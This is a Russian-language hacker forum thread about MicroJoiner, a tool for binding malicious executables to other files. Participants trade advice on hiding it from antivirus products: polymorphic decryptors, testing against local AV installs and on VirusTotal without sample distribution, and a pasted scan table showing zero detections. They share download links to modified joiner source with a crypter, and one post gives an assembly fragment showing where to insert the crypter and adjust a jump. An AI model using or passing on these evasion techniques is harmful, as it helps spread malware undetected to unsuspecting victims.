MicroJoiner

[teamster mist]

Споры о том,что отправляют или нет ведутся давно и никто наверняка не знает(приведут примеры сторонники обоих взглядов)..если логично рассуждать, то через подобные ресурсы проходят тысячи файлов ежедневно и что, файлы даже без вирей они будут отсылать? Да и как еще проверить? не ставить же по очереди десяток AV..
P.S. а саламандра молодца ;-) только халявщили выстроились в очередь, а она грит: я передумала..ничего не попишешь, женщины не постоянны..

 

[BAY]

споры на эту тему велись и ведуться очень давно. Саламандра, почетай это:http://www.xss.pro/index.php?topic=9286 .. От себя могу добавить что навено отправляются не все файлы, а те которые спалил хотя бы один антивирус

 

[salamandra]

От себя могу добавить что навено отправляются не все файлы, а те которые спалил хотя бы один антивирус

Всё это может быть и так но где же прикажеш проверять всё это или ставить на свой комп весь этот набор антивирей?
Или декриптор делать полностью полиморфным!Алгоритм останется тем же но
в расшифровщике не будет постоянных сигнатур!Впрочем эвристиками всё это по большому счёту
давно просекается и если раскусят сам алгоритм то тут спасёт токо его перестройка!

 

[BAY]

ну у меня на компе стоят каспер, нод, др. вэб и аваст .. остальными люди имхо почти не пользуются( ну битдефендер еще) .. тут смысл такой что первым надо касперского ставить.. а остальные ставяться без напрягов.. даже в памяти сосуществуют норм(чему я удивился) .. напиши bat файл который прогоняет твой файл по всем антивирусам и всё...

я тоже месяц назад прятал этот же джойнер от своих антивирусов(каспер, нод, др. вэб и аваст) .. могу исходники дать для общего развития(бесплатно)

 

[salamandra]

я тоже месяц назад прятал этот же джойнер от своих антивирусов(каспер, нод, др. вэб и аваст) .. могу исходники дать для общего развития(бесплатно)

Была бы очень признательна!Я тебе в личьку написала!

 

[St.]

ну у меня на компе стоят каспер, нод, др. вэб и аваст .. остальными люди имхо почти не пользуются

у нас может и не пользуются, а на западе всё возможно ......

 

[KodRed]

BAY
На момент релиза, ни один антивирус не определил вредоносный код. Проверено на virustotal.com (без галочки distribute)

Antivirus Version Update Result
AntiVir 6.35.1.0 08.12.2006 no virus found
Authentium 4.93.8 08.13.2006 no virus found
Avast 4.7.844.0 08.10.2006 no virus found
AVG 386 08.11.2006 no virus found
BitDefender 7.2 08.13.2006 no virus found
CAT-QuickHeal 8.00 08.12.2006 no virus found
ClamAV devel-20060426 08.13.2006 no virus found
DrWeb 4.33 08.12.2006 no virus found
eTrust-InoculateIT 23.72.94 08.12.2006 no virus found
eTrust-Vet 30.3.3016 08.13.2006 no virus found
Ewido 4.0 08.12.2006 no virus found
Fortinet 2.77.0.0 08.12.2006 no virus found
F-Prot 3.16f 08.13.2006 no virus found
F-Prot4 4.2.1.29 08.13.2006 no virus found
Ikarus 0.2.65.0 08.11.2006 no virus found
Kaspersky 4.0.2.24 08.13.2006 no virus found
McAfee 4827 08.11.2006 no virus found
Microsoft 1.1508 08.04.2006 no virus found
NOD32v2 1.1704 08.11.2006 no virus found
Norman 5.90.23 08.11.2006 no virus found
Panda 9.0.0.4 08.12.2006 no virus found
Sophos 4.08.0 08.13.2006 no virus found
Symantec 8.0 08.13.2006 no virus found
TheHacker 5.9.8.191 08.13.2006 no virus found
UNA 1.83 08.11.2006 no virus found
VBA32 3.11.0 08.13.2006 no virus found
VirusBuster 4.3.7:9 08.12.2006 no virus found

все с последними апдейтами, песдато

 

[BAY]

2zombiexe: это ты мой тестил?

 

[Bendar]

да немешалобы паскарей выложить такую крутую штуку

 

[salamandra]

Круче некуда!
Исходники модефецированного микроджоя:
http://rapidshare.de/files/31705002/Mj17src2.rar.html

 

[manometer]

2 salamandra а зачем удалять то .Раз выложила так пусь народ пользуетсь , а то file was deleted by the uploader. нехорошо...

 

[BAY]

2salamandra: исходнеги часом не те что я те дал?)

 

[salamandra]

Нет не те!

 

[salamandra]

Перезалила!

http://rapidshare.de/files/31812561/Mj17src2.rar.html
Криптор там простой так что некоторыми антивирями всеравно палится!Там где вообще не палится выкладывать не собираюсь!В архиве именённые и оригинальные файлы!А так же видео реадме для тех кто сталкивается с этим впервые!

 

[manometer]

Да за хелп пасибки!У меня тока один вопрос чтоб изменить способ криптования нуно в то место где у тя написано криптор вставлять свое?И еще в прошлый раз ты вылаживала джоинер но не детектился он только при включенной опции паковать, почему?Ты изменяла не способ криптовки а паковки, так?

 

[manometer]

Этот тоже детектится без пакования, почему?
Добавлено в [time]1157304194[/time]
ВАУ и xqwerx че молчите может че посоветуете?

 

[salamandra]

У меня тока один вопрос чтоб изменить способ криптования нуно в то место где у тя написано криптор вставлять свое?

Совершенно верно!токо нужно вычеслить смещение адресов относительно размера кода криптера!

И еще в прошлый раз ты вылаживала джоинер но не детектился он только при включенной опции паковать, почему?Ты изменяла не способ криптовки а паковки, так?

тут всё просто!способ паковки я не изменяла а просто в исходнике нужно изменить всего один переход и немного подправить криптор то биш криптор работает только если этот переход не срабатывает а срабатывает он при опции паковать

@get_offset_loop3:
cmp dword ptr[eax], 0AABBCCDDh
jz @write_ml
inc eax
jmp @get_offset_loop3

@write_ml:
push MaxLen
pop [eax]

.IF DoPackOption ;вот он,если 0 то переход
криптер
.ENDIF;если условие верно то переход сюда

; Write stub (loader) & .rsrc section
invoke WriteFile, edi, lpStubMem, StubLen, addr dwWritten, NULL

 

[manometer]

А зачем нужна такая морока, пусть бы работал и с выключеной опцией паковать, или не все так просто?

 

[salamandra]

Можнно и так и эдак зделать!Просто лень было!А что до простоты то ничего сложного нет!Смещения легко вычислить при помощи отладчика и калькулятора виндошного!А можно и подругому!

 

[manometer]

Ну раз начала договаривай....